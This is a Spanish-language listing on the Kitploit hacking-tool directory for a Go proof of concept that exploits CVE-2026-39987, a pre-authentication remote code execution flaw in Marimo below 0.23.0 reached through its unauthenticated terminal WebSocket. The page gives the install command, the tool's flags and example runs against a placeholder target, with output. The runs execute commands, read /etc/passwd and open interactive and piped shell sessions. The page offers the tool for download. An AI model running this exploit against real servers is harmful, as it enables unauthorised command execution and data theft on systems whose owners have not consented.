Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
cve-2026-39987 — Explota CVE-2026-39987, RCE previo a la autenticación en Marimo <0.23.0, al conectarse al WebSocket no autenticado /terminal/ws. Admite ejecución arbitraria de comandos, entrada canalizada y sesiones de shell interactivas. | Kitploit
Herramientas/GitHubGitHub/matesz44/cve-2026-39987
Autenticación y AutorizaciónExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónRed Teaming
GitHubmatesz44/cve-2026-39987

cve-2026-39987

Explota CVE-2026-39987, RCE previo a la autenticación en Marimo <0.23.0, al conectarse al WebSocket no autenticado /terminal/ws. Admite ejecución arbitraria de comandos, entrada canalizada y sesiones de shell interactivas.

Ver Repositorio
6hace 28 díasAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir


cve-2026-39987

Instalación • Uso • Ejemplos

Solo estoy probando Go :D Por cierto: CVE-2026-39987 PoC: Marimo<0.23.0 Pre-Auth Remote Code Execution via Terminal WebSocket Authentication Bypass (sin verificación de authn en /terminal/ws).

Recursos:

  • https://github.com/marimo-team/marimo/security/advisories/GHSA-2679-6mx9-h9xc
  • https://nvd.nist.gov/vuln/detail/CVE-2026-39987

Instalación

root@kitploit:~
go install -v github.com/matesz44/cve-2026-39987/cmd/cve-2026-39987@latest

Uso

root@kitploit:~
cve-2026-39987 -h

Esto mostrará la ayuda de la herramienta. Aquí están todos los parámetros que soporta.

root@kitploit:~
CVE-2026-39987 PoC: Marimo<0.23.0 Pre-Auth Remote Code Execution via Terminal WebSocket Authentication Bypass
- Source: https://github.com/marimo-team/marimo/security/advisories/GHSA-2679-6mx9-h9xc

Usage:
  ./cve-2026-39987 [flags]

Flags:
   -t, -target string  Target WebSocket URL (required, e.g., ws(s)://[TARGET]:([PORT])/terminal/ws)
   -c, -cmd string     Command to Run (default "uname -a")
   -i, -interactive    Interactive Mode

Ejemplos

Comando por defecto (uname -a):

root@kitploit:~
cve-2026-39987 -t ws(s)://<TARGET>[:PORT]/terminal/ws
REDACTED@REDACTED:~$ uname -a
Linux [...]
REDACTED@REDACTED:~$ exit
exit

[INF:normalclose] websocket: close 1000 (normal): Terminal session ended

Comando personalizado (-c):

root@kitploit:~
cve-2026-39987 -t ws(s)://<TARGET>[:PORT]/terminal/ws -c "cat /etc/passwd"
REDACTED@REDACTED:~$ cat /etc/passwd
exit
root:x:0:0: [...]
REDACTED@REDACTED:~$ exit
exit

[INF:normalclose] websocket: close 1000 (normal): Terminal session ended

Modo interactivo (-i):

root@kitploit:~
cve-2026-39987 -t ws(s)://<TARGET>[:PORT]/terminal/ws -i
REDACTED@REDACTED:~$ id
id
uid=1000(REDACTED) gid=1000(REDACTED) groups=1000(REDACTED)
REDACTED@REDACTED:~$ whoami
whoami
REDACTED
REDACTED@REDACTED:~$ exit
exit
exit

[INF:normalclose] websocket: close 1000 (normal): Terminal session ended

Tuberías:

root@kitploit:~
printf "id\nwhoami" | cve-2026-39987 -t ws(s)://<TARGET>[:PORT]/terminal/ws
REDACTED@REDACTED:~$ id
whoami
exit
uid=1000(REDACTED) gid=1000(REDACTED) groups=1000(REDACTED)
REDACTED@REDACTED:~$ whoami
REDACTED
REDACTED@REDACTED:~$ exit
exit

[INF:normalclose] websocket: close 1000 (normal): Terminal session ended
Descargar herramienta